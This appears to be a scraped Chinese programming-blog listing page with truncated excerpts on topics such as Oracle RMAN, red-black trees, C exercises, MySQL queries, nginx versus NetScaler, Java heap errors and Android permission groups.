LIST 命令使用RMAN LIST 命令显示有关资料档案库中记录的备份集、代理副本和映像副本的信息。使用此命令可列出： • RMAN 资料档案库中状态不是AVAILABLE 的备份和副本 • 可用的且可以用于还原操作的数据文件备份和副本 • 备份集和副本，其中包含指定数据文件列表或指定表空间的备份 • 包含指定名称或范围的所有归档日志备份的备份集和副本 • 由标记、完成时间、可
二叉树:红黑树 dieslrae 二叉树
红黑树是一种自平衡的二叉树,它的查找,插入,删除操作时间复杂度皆为O(logN),不会出现普通二叉搜索树在最差情况时时间复杂度会变为O(N)的问题. 红黑树必须遵循红黑规则,规则如下 1、每个节点不是红就是黑。 2、根总是黑的 &
C语言homework3，7个小题目的代码 dcj3sjt126com c
1、打印100以内的所有奇数。 # include <stdio.h> int main(void) { int i; for (i=1; i<=100; i++) { if (i%2 != 0) printf("%d ", i); } return 0; } 2、从键盘上输入10个整数，
自定义按钮, 图片在上, 文字在下, 居中显示 dcj3sjt126com 自定义
#import <UIKit/UIKit.h> @interface MyButton : UIButton -(void)setFrame:(CGRect)frame ImageName:(NSString*)imageName Target:(id)target Action:(SEL)action Title:(NSString*)title Font:(CGFloa
MySQL查询语句练习题，测试足够用了 flyvszhb sql mysql
http://blog.sina.com.cn/s/blog_767d65530101861c.html 1.创建student和score表 CREATE TABLE student ( id INT(10) NOT NULL UNIQUE PRIMARY KEY , name VARCHAR
转：MyBatis Generator 详解 happyqing mybatis
MyBatis Generator 详解 http://blog.csdn.net/isea533/article/details/42102297 MyBatis Generator详解 http://git.oschina.net/free/Mybatis_Utils/blob/master/MybatisGeneator/MybatisGeneator.
让程序员少走弯路的14个忠告 jingjing0907 工作计划学习
无论是谁，在刚进入某个领域之时，有再大的雄心壮志也敌不过眼前的迷茫：不知道应该怎么做，不知道应该做什么。下面是一名软件开发人员所学到的经验，希望能对大家有所帮助 1.不要害怕在工作中学习。只要有电脑，就可以通过电子阅读器阅读报纸和大多数书籍。如果你只是做好自己的本职工作以及分配的任务，那是学不到很多东西的。如果你盲目地要求更多的工作，也是不可能提升自己的。放
nginx和NetScaler区别流浪鱼 nginx
NetScaler是一个完整的包含操作系统和应用交付功能的产品，Nginx并不包含操作系统，在处理连接方面，需要依赖于操作系统，所以在并发连接数方面和防DoS攻击方面，Nginx不具备优势。 2.易用性方面差别也比较大。Nginx对管理员的水平要求比较高，参数比较多，不确定性给运营带来隐患。在NetScaler常见的配置如健康检查，HA等，在Nginx上的配置的实现相对复杂。 3.策略灵活度方
第11章动画效果（下） onestopweb 动画
index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
FAQ - SAP BW BO roadmap blueoxygen BO BW
http://www.sdn.sap.com/irj/boc/business-objects-for-sap-faq Besides, I care that how to integrate tightly. By the way, for BW consultants, please just focus on Query Designer which i
关于java堆内存溢出的几种情况 tomcat_oracle java jvm jdk thread
【情况一】：　　 java.lang.OutOfMemoryError: Java heap space：这种是java堆内存不够，一个原因是真不够，另一个原因是程序中有死循环；　　如果是java堆内存不够的话，可以通过调整JVM下面的配置来解决：　　<jvm-arg>-Xms3062m</jvm-arg> 　　<jvm-arg>-Xmx
Manifest.permission_group权限组阿尔萨斯 Permission
结构继承关系 public static final class Manifest.permission_group extends Object java.lang.Object android. Manifest.permission_group 常量 ACCOUNTS 直接通过统计管理器访问管理的统计 COST_MONEY可以用来让用户花钱但不需要通过与他们直接牵涉的权限 D